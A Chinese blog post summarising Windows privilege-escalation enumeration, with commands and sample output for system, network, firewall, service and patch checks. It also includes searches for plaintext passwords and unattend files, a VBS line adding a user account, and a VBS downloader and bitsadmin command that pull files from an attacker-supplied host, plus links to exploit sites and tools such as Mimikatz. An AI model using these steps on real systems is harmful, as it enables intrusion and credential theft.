Windows 提权方法总结

2016-11-23

文章来源

BASIC WINDOWS PRIVILEGE ESCALATION
https://thel3l.me/blog/winprivesc/index.html
由于原文有些命令在中文Windows下无效，所以另外整理了下

系统信息

获取系统名称和版本

1
2
3

C:\Windows\system32>systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
OS 名称:          Microsoft Windows 10 专业版
OS 版本:          10.0.14393 暂缺 Build 14393

检查系统版本位数

如果是64位系统则返回”AMD64”否则返回”X86”
1
2
C:\>echo %PROCESSOR_ARCHITECTURE%
AMD64

X86

查看系统所有环境变量

C:\>SET
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\V\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=V_V
ComSpec=C:\Windows\system32\cmd.exe

查看计算机所有用户

NET USER

net user

查看指定用户详细详细

NET USER USERNAME

C:\>net user Administrator
用户名                 Administrator
全名
注释                   管理计算机(域)的内置帐户
用户的注释
国家/地区代码          000 (系统默认值)
帐户启用               No
帐户到期               从不
上次设置密码           2016/9/18 10:40:15
密码到期               从不
密码可更改             2016/9/18 10:40:15
需要密码               Yes
用户可以更改密码       Yes
允许的工作站           All
登录脚本
用户配置文件
主目录
上次登录               从不
可允许的登录小时数     All
本地组成员             *Administrators       *Ssh Users
全局组成员             *None
命令成功完成。

网络信息

查看基本网络情况

IPCONFIG /ALL

IPCONFIG /ALL

查看路由表

route print

路由表信息

查看ARP缓存

arp -A

ARP缓存

防火墙相关

查看端口占用情况
netstat -ano

netstat -ano

防火墙配置
netsh firewall show config

C:\>netsh firewall show config
域 配置文件配置:
-------------------------------------------------------------------
操作模式                          = 启用
例外模式                          = 启用
多播/广播响应模式                 = 启用
通知模式                          = 启用
域 配置文件的允许的程序配置:
模式     流量方向             名称/程序
-------------------------------------------------------------------
域 配置文件的端口配置:
端口   协议    流量方向              名称
-------------------------------------------------------------------
域 配置文件的 ICMP 配置:
模式     类型  描述
-------------------------------------------------------------------
启用       2     允许出站数据包太大

防火墙状态
netsh firewall show state

C:\>netsh firewall show state
防火墙状态:
-------------------------------------------------------------------
配置文件                          = 标准
操作模式                          = 禁用
例外模式                          = 启用
多播/广播响应模式                 = 启用
通知模式                          = 启用
组策略版本                        = Windows 防火墙
远程管理模式                      = 禁用
所有网络接口上的端口当前均为打开状态:
端口   协议  版本  程序
-------------------------------------------------------------------
当前没有在所有网络接口上打开的端口。
重要信息: 已成功执行命令。
但不赞成使用 "netsh firewall"；
而应该使用 "netsh advfirewall firewall"。
有关使用 "netsh advfirewall firewall" 命令
而非 "netsh firewall" 的详细信息，请参阅
http://go.microsoft.com/fwlink/?linkid=121488
上的 KB 文章 947709。

应用程序和服务

查看正在运行的程序和服务

schtasks /QUERY /fo LIST /v
以list的形式输入详细信息

主机名:                             VVV
任务名:                             \Microsoft\XblGameSave\XblGameSaveTaskLogon
下次运行时间:                       N/A
模式:                               就绪
登录状态:                           交互方式/后台方式
上次运行时间:                       2016/9/17 21:05:59
上次结果:                           0
创建者:                             Microsoft
要运行的任务:                       %windir%\System32\XblGameSaveTask.exe logon
起始于:                             N/A
注释:                               XblGameSave Logon Task
计划任务状态:                       已启用
空闲时间:                           仅在空闲  分钟后启动, 如果没空闲，重试  分钟 如果空闲结束，停止任务
电源管理:                           不用电池启动
作为用户运行:                       SYSTEM
删除没有计划的任务:                 已禁用
如果运行了 X 小时 X 分钟，停止任务: 02:00:00
计划:                               计划数据在此格式中不可用。
计划类型:                           登陆时
开始时间:                           N/A
开始日期:                           N/A
结束日期:                           N/A
天:                                 N/A
月:                                 N/A
重复: 每:                           N/A
重复: 截止: 时间:                   N/A
重复: 截止: 持续时间:               N/A
重复: 如果还在运行，停止:           N/A

查看服务的进程ID

tasklist /SVC

tasklist /SVC

查看已安装的驱动程序列表

DRIVERQUERY

C:\>DRIVERQUERY
模块名       显示名称               驱动程序类型  链接日期
============ ====================== ============= ======================
1394ohci     1394 OHCI Compliant Ho Kernel        2016/7/16 10:21:36
3ware        3ware                  Kernel        2015/5/19 6:28:03
ACPI         Microsoft ACPI Driver  Kernel        2016/7/16 10:10:47
AcpiDev      ACPI 设备驱动程序      Kernel        2016/7/16 10:29:10
acpiex       Microsoft ACPIEx Drive Kernel        2016/7/16 10:28:23
acpipagr     ACPI 处理器聚合器驱动  Kernel        2016/7/16 10:29:00
AcpiPmi      ACPI 电源表驱动程序    Kernel        2016/7/16 10:19:44
acpitime     ACPI 唤醒警报驱动程序  Kernel        2016/7/16 10:29:20

也可以通过WMIC获取更多信息

查看已安装程序相关信息(包括程序名、供应商、版本、识别号等)
Caption、Identifying Number 、Name、Vendor、Version
比如我安装的XShell相关信息如下
1
2
3
4
5
Xshell 5
{F3FDFD5A-A201-407B-887F-399484764ECA}
Xshell 5
NetSarang Computer, Inc.
5.0.0983
按照类似的方法还可以获取服务、进程、和启动项相关信息
1
2
3
4
5
6
# Lists services
wmic service list brief
# Lists processes
wmic process list brief
# Lists startup items
wmic startup list brief
查看是否有可作为非特权用户执行的msi文件
如果没有则会返回”错误: 系统找不到指定的注册表项或值。”

1 2	reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

查看setuid或setgid是否被修改过
只存在于Windows Servers中

1	reg query HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits

查看系统更新记录
wmic qfe get Caption,Description,HotFixID,InstalledOn

C:\Windows\system32>wmic qfe get Caption,Description,HotFixID,InstalledOn
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=3176936  Update           KB3176936  8/26/2016
http://support.microsoft.com/?kbid=3188128  Security Update  KB3188128  9/16/2016
http://support.microsoft.com/?kbid=3189866  Security Update  KB3189866  9/16/2016

1
2
3

#还可以搜索可提升权限的特定漏洞，比如
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3189031"
#如果没有返回信息则说明没安装该补丁

##敏感数据和目录

搜索未加密的密码或其它敏感信息
1
2
3
4
5
6
7
8
9
#进入系统盘根目录
cd/
#返回该分区所有名为password.txt的文件的路径
dir /b/s password.txt
#返回该分区所有以config开头的文件的路径
dir /b/s config.*
#在特定格式的文件中搜索特定信息，比如
findstr /si password *.xml *.ini *.txt
findstr /si login *.xml *.ini *.txt
在一些大型企业中，系统可能是通过脚本自动安装的，一些文件中可能存在包含base64编码的日志，这些文件一般位于如下路径
1
2
3
4
C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml

##文件系统

了解有什么样的访问权限、可访问目录等

###使用其他语言绕过一些限制
以Python为例(如果目标机器安装了Python)

C:\>python
Python 2.7.12 (v2.7.12:d33e0cf91556, Jun 27 2016, 15:24:40) [MSC v.1500 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import os; os.system("cmd /c net user")
\\VV 的用户帐户
-------------------------------------------------------------------------------
Administrator            DefaultAccount           defaultuser0
Guest                    Junhu
命令成功完成。

使用VBS脚本

D:\>copy con commandExec1.vbs
Call WScript.CreateObject("Wscript.Shell").Run("cmd /K net user demo /add", 8, True)^Z
已复制         1 个文件。
D:\>commandExec1.vbs

###或者通过打开一个ftp来执行相关命令

#使用copy con创建批处理文件,输入"ftp"按CTRL+z后回车，即可创建成功
copy con run_ftp.bat
#运行文件
run_ftp.bat
ftp>!dir

###检查可写文件

1	dir /a-r-d /s /b

##使用脚本

###使用VB脚本下载相应东西到目标主机

来自 Igor

' downloadfile.vbs
' Set your settings
strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}"
strHDLocation = "c:\\{FILE_NAME.EXT}"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing

运行下载脚本

1	cscript.exe downloadfile.vbs

####bitsadmin

或者如果你知道目标主机为Windows 7 以上的操作系统，则可使用bitsadmin实现下载
目标url:http://static.myhack58.com/img/logo.jpg
保存地址:D:\logo.jpg
1
bitsadmin /rawreturn /transfer getfile http://static.myhack58.com/img/logo.jpg D:\logo.jpg
Exploits and shellcode

http://www.exploit-db.com
http://1337day.com
http://0day.today
http://www.securityfocus.com
http://seclists.org/fulldisclosure/
http://www.exploitsearch.net
http://www.securiteam.com
http://metasploit.com/modules/
http://securityreason.com
https://cxsecurity.com/exploit/
http://securitytracker.com/

其他优秀资源

rmusser01’s GitHub document to Post Exploitation on Windows
Tim Arneaud on Windows Privilege Escalation
An article on WMIC
Luke Jennings on Group Policy Hijacking Attacks
Toying with the Windows API
enaqx - Excellent curated collection of content

PowerShellMafia’s PowerSploit
The SysInternals suite
Windows Credential Editor
Mimikatz - Credential Extraction
GDSSecurity’s Windows Exploit Suggester
SpiderLab’s Responder - A LLMNR, NBT-NS and MDNS poisoner
PowerShellEmpire’s Empire - Pure PowerShell post-exploitation agent
rabbitstack’s fibratus - A tool for exploration and tracing of the Windows kernel